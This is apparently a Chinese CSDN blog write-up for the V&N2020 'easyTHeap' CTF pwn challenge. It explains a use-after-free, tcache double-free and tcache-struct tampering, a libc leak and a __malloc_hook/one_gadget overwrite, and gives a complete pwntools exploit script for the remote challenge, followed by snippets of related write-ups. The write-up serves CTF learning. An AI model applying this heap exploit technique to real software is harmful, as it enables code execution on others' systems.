[V&N2020 公开赛]easyTHeap writeup

最新推荐文章于 2024-08-13 14:48:40 发布
最新推荐文章于 2024-08-13 14:48:40 发布
阅读量445 收藏
点赞数
文章标签: UAF tcache libc地址泄露 malloc_hook 内存操控
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/109252904
版权

基本情况

保护全开

[*] '/ctf/work/vn_pwn_easyTHeap'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

基本堆管理器,有增删查改功能。用 chunk_ptr_list 和 chunk_size_list 两个链表维护堆,堆数量实际上不由两个全局变量控制,而是受限于 chunk_ptr_list 是否有空位写入。全部功能操作都是基于下标去两个链表寻找对应地址操作的。

漏洞

在释放的时候没有将 chunk_ptr_list 对应位置置零,造成 UAF :

if ( v1 < 0 || v1 > 6 || !chunk_ptr_list[v1] )
exit(0);
free((void *)chunk_ptr_list[v1]);
chunk_size_list[v1] = 0;                      // chunk_ptr_list 没有置零

注意一点是 chunk_size_list 对应位置被置零了,也就是不能使用 edit 功能写入:

printf("content:");
read(0, (void *)chunk_ptr_list[v1], (unsigned int)chunk_size_list[v1]);

思路

  1. 泄露堆地址,计算出 tcache struct 地址
  2. 修改结构体中对应 size 的数量标志位,将堆释放进 unsorted bin 泄露出 libc 地址
  3. 将 tcache 相关数量标志位恢复,将链头地址修改为 malloc_hook ,后面就是常规操作

为记笔记方便,下面所有地址均不是同一运行调试所得 Orz

当程序释放第一个堆进 tcache 时会申请一块 0x240 的空间放 tcache struct ,里面记录各个 size 的数量和链头地址。

Allocated chunk | PREV_INUSE
Addr: 0x5555564b5000
Size: 0x251

Allocated chunk | PREV_INUSE
Addr: 0x5555564b5250
Size: 0x91

然后连续两次释放 chunk0 ,chunk0 fd 指针就会记录自己的地址。(tcache bin 中不会崩):

pwndbg> bin
tcachebins
0x90 [  2]: 0x55555656b260 ◂— 0x55555656b260

用程序查询功能泄露地址,其与 tcache struct 偏移固定的。

再申请相同 size 的堆,分配的是 chunk0 所在的空间,通过 edit 将 chunk0 fd 覆盖为 tcache struct ,两次分配后将堆分配到结构体上面。

顺便 gdb 记一下结构体内容,因为需要对应修改某个地址的值,达到修改某个 size 对应的链表。当申请的 size 时,需要修改的位置也会不一样。

image-20201019011117803

这里将 0x01 修改为 0x07 (MAX_NUM) ,到达上限后再释放一个堆就开始放入 unsorted bin 。释放 chunk0 ,show 泄露 libc 地址。

完事后,edit chunk3 将结构体 0x07 恢复为 0x01 ,链首地址修改为 malloc_hook 地址,形成这样的效果:

# tcache bin 0x90 这条链表中只有 1 个堆,地址为 malloc_hook
pwndbg> bin
tcachebins
0x90 [  1]: [malloc_hook地址] ……

这样下次分配就会分配到 malloc_hook 。实测后这个题目需要结合 realloc 调整栈帧环境,让 onegadget 生效。

EXP

下面这个脚本是成功攻击远程的,与前面原理一样,只是做题的时候在 docker 环境做 main_arean 的偏移算出来和远程的 18 不相同。。。

这里就直接将 tcache 全部链表数量都改了,然后将 malloc_hook-8 放到任意链首,然后申请对应大小的 chunk 就能分配到 malloc_hook 上了

from pwn import *
context(log_level='debug',arch='amd64',
	terminal=['tmux','sp','-h'])

# p = process(["/glibc/2.27/64/lib/ld-2.27.so", "./vn_pwn_easyTHeap"], env={"LD_PRELOAD":"/glibc/2.27/64/lib/libc.so.6"})
# libc = ELF("/glibc/2.27/64/lib/libc.so.6")
elf = ELF("./vn_pwn_easyTHeap")
p = remote("node3.buuoj.cn",28954)
libc = ELF("./libc-2.27.so")

def new(size):
	p.recvuntil(": ")
	p.sendline("1")
	p.recvuntil("?")
	p.sendline(str(size))
def edit(id,content):
	p.recvuntil(": ")
	p.sendline("2")
	p.recvuntil("?")
	p.sendline(str(id))
	p.recvuntil(":")
	p.send(content)
def show(id):
	p.recvuntil(": ")
	p.sendline("3")
	p.recvuntil("?")
	p.sendline(str(id))
def delete(id):
	p.recvuntil(": ")
	p.sendline("4")
	p.recvuntil("?")
	p.sendline(str(id))

new(0x50) #0
delete(0)
delete(0)
show(0)
heap_base = u64(p.recvuntil(b'\n', drop = True).ljust(8, b'\x00'))

new(0x50) #1 -> chunk0
edit(1, p64(heap_base - 0x250))
new(0x50) #2 -> chunk0
new(0x50) #3 -> tcache struct
edit(3, 'a'*0x24)

delete(3)
show(3)
libc_base = u64(p.recvuntil(b'\n', drop = True).ljust(8, b'\x00')) - 0x3ebca0#0x3afca0
log.info("libc_base:"+hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
log.info("malloc_hook:"+hex(malloc_hook))
realloc = libc_base + libc.sym['__libc_realloc']
log.info(hex(realloc))
one = libc_base + 0x4f322
new(0x100)#4 -> tcache struct
edit(4, b'b' * 0x60 +  p64(malloc_hook - 8))
# gdb.attach(p)
new(0x50)
edit(5, p64(one) + p64(realloc+8))
new(0x10)
p.interactive()
SkYe231_
关注
2020 年 V&N 内部考核赛 WriteUp
12-22
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') ...
[BUUCTF]PWN——[V&N2020 公开赛]easyTHeap
mcmuyanga的博客
01-04 319
[V&N2020 公开赛]easyTHeap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,常见的堆的菜单 64位ida载入,main函数 最多只能申请7个chunk,delete只能执行3次 add() add函数只能创建一个chunk,不能读入数据,读入数据需要用到edit函数 edit() show() delete() 这题的libc是2.27,在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1333
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
[V&N2020 公开赛]easy_RSA 题解
最新发布
weixin_52108340的博客
08-13 236
从公式可以得知需求出p,q,r,然后逆元出di,从而解出c,m,直接看代码。从题目可以得知公式,三角代表已知数。
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
PLpa的博客
06-06 1098
在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注意libc版本。 对tcache不是很了解建议看看CTFWiKi 1.[V&N2020 公开赛]easyTHeap 保护全开,libc2.27版本,进入IDA 看到程序有增删改查的功能。 我们一个个来看: add: 我们可以看到add中不能写入数据。 edit: add中不能读入的数据由edit来读入。 show: 没什么特殊的,就是输出数据,这里我们可以用其来查看我们泄露的地址。 dele
BUUCTF Crypto [V&N2020 公开赛]easy_RSA wp
hsqGOD's blog
04-21 1862
这道题我们看到加密的脚本,首先我们可以关注到,这题目的素数生成机制是不断的乘然后再减一可以得到素数,我们可以发现,因子p再加一也就是p+1是光滑到,于是我们可以使用Williams’p+1 algorithm求解 可以直接调用库的函数 // 命令行调用即可 python2 -m primefac -vs -m=p+1 794137173995657728016066441938374096751...
[V&N2020 公开赛]easyTHeap
、moddemod
07-06 481
ubuntu18.04 libc-2.27有Tcache机制,这道题malloc的指针数组在free的时没有置空… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(size): p.sendlineafter('choice:', str(1)) p.sendlineafter('size?', st.
2020YCBCTF羊城杯官方Writeup.pdf
10-28
标题《2020YCBCTF羊城杯官方Writeup.pdf》中的“YCBCTF”指的是一种名为“羊城杯”的网络安全竞赛(CTF),这是一个以网络安全为主题的竞赛,CTF全称Capture The Flag,即“夺旗赛”,是一种信息安全竞赛活动。...
自己ctf比赛的writeup.zip
10-01
在CTF(Capture The Flag)比赛中,Writeup通常是指参赛者对比赛过程、解题思路以及解决方案的详细记录。这个“自己ctf比赛的writeup.zip”文件很可能包含了作者在参与CTF比赛时的全部心得体验,包括但不限于解题...
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
Writeup.rar
12-01
标题 "Writeup.rar" 暗示这可能是一个关于技术分析或解决问题的文档集合,可能是某项编程竞赛、课程作业或者编程挑战的解决方案。描述中同样提到 "Writeup.rar",意味着这个压缩包可能包含了对某个问题或项目的详细...
7.6每日三题
PUTAOAO的博客
07-06 303
Fast from Crypto.Util.number import * from secret import flag p = getPrime(1024)106417460801952098564106499070151038873024911455536068339939244771790540941720274028587207976808157868694798197258813111268537142798255715538795631061310640662123200632946626
[BUUCTF][VNCTF2022公开赛]web wp
cosmoslin的博客
02-14 2573
GameV4.0 base64解码即可 newcalc0 镜像为node:lts-alpine,package.json全部为最新包 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json(
vn_pwn_babybabypwn_1(SROP+栈迁移)
seaaseesa的博客
04-09 619
vn_pwn_babybabypwn_1 首先检查一下程序的保护机制 然后,我们用IDA分析一下 显然一个signreturn的系统调用,因此可以做SROP。由于开启了PIE,因此,我们不考虑程序的bss段,而是考虑glibc的bss段,因为重新一开始告诉了我们puts函数的地址,我们就可以知道glibc的地址。我们先利用read在glibc的bss段布置下rop,然后栈迁移过去即可...
VNCTF2022公开赛
shinygod的博客
03-15 440
gocalc0 00x1预期解 点击 把session拿去解码一下(末尾有==base64解码一下) 两次编码就出来了(本来我以为) 00x2非预期解 import ( _ "embed" "fmt" "os" "reflect" "strings" "text/template" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gi
[V&N2020 公开赛 web]
weixin_43610673的博客
04-05 1092
HappyCTFd CVE-2020-7245 https://nvd.nist.gov/vuln/detail/CVE-2020-7245 https://www.colabug.com/2020/0204/6940556/ 开始以为是注入,尝试了好一会无从下手,然后看wp知道是cve。。。https://www.zhaoj.in/read-6407.html 注册一个 admin用户...
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1465
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值